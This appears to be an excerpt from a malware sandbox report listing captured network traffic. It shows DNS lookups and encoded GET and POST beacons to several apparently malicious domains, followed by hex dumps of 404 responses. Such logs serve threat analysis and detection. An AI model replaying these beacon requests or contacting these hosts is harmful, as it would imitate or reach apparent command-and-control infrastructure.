Source: global traffic; HTTP traffic detected: GET /csz1/?np=B1/oNyROsiSyJWt29sj2S0IFRvICl+iEjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eGqtyx0Ndpfqa25N0T4jVP+zcs/aWlws8PlhiBv+1+sYYzcOzaf0=&O4s0=7rrhM HTTP/1.1 | Host: www.nevsehir-nakliyat.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
Source: global traffic; HTTP traffic detected: GET /wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiJL1tOfgyOKUOFFDpBfdN6WGkZZw760Atp7sDgLoyqrjSo8Yq8vY=&O4s0=7rrhM HTTP/1.1 | Host: www.masteriocp.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
Source: global traffic; HTTP traffic detected: GET /09dt/?np=rbfG5gS9WKSJFi6SRtlEG1H5qgha+qyBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFY+8px5RXtAkGOTa83eEXxiWZoc8O/jqsRPGTy32XZb2ldw74hvQ=&O4s0=7rrhM HTTP/1.1 | Host: www.kryto.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
Source: global traffic; HTTP traffic detected: GET /efkd/?np=IufelbUCTKOeuwMC8EUMZp6RlpEgAJDIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7lhYpBivnSDbaB35/ERUm/0qpp+YY+ZI0WrG4EzYBf/iASgSBweg=&O4s0=7rrhM HTTP/1.1 | Host: www.angelenterprise.biz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
Source: global traffic; DNS traffic detected: DNS query: www.nosr.net
Source: global traffic; DNS traffic detected: DNS query: www.monos.shop
Source: global traffic; DNS traffic detected: DNS query: www.complexity.pub
Source: global traffic; DNS traffic detected: DNS query: www.nevsehir-nakliyat.xyz
Source: global traffic; DNS traffic detected: DNS query: www.masteriocp.online
Source: global traffic; DNS traffic detected: DNS query: www.kryto.top
Source: global traffic; DNS traffic detected: DNS query: www.angelenterprise.biz
Source: global traffic; DNS traffic detected: DNS query: www.dyme.tech
            Source: unknownHTTP traffic detected: POST /4c7j/ HTTP/1.1Host: www.complexity.pubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Content-Length: 207Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedOrigin: http://www.complexity.pubReferer: http://www.complexity.pub/4c7j/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530Data Raw: 6e 70 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6e 77 30 41 31 53 68 69 73 6e 76 6f 56 6e 56 67 38 32 55 30 36 34 55 31 46 35 65 5a 46 41 47 75 44 78 78 53 6c 43 6c 54 48 5a 61 6f 35 6c 63 69 48 39 4a 54 49 69 6f 76 64 72 6d 64 77 55 79 31 6c 47 6c 6c 38 30 71 37 32 30 5a 68 70 4d 61 6f 69 50 6b 50 31 4e 48 73 41 39 58 42 4b 62 43 76 71 59 2f 78 78 46 33 49 51 68 4e 37 2b 5a 45 64 73 42 51 2b 38 2b 6c 79 41 7a 35 71 45 44 4a 4f 73 48 72 38 4a 52 66 63 52 70 50 4f 33 33 68 6e 4e 52 49 35 44 59 34 38 51 76 31 5a 34 66 37 74 65 36 41 64 6c 39 71 4f 73 6c 6c 31 4a 64 6a 52 6e 32 50 31 55 38 5a 75 79 69 64 30 56 55 2b 34 Data Ascii: np=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DY48Qv1Z4f7te6Adl9qOsll1JdjRn2P1U8Zuyid0VU+4
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 07:02:37 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 
32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 18 Sep 2024 07:03:02 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 18 Sep 2024 07:03:05 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 18 Sep 2024 07:03:07 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Wed, 18 Sep 2024 07:03:10 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 18 Sep 2024 07:03:23 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-18T07:03:28.9027992Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 07:03:44 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 
2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 07:03:46 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 
2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 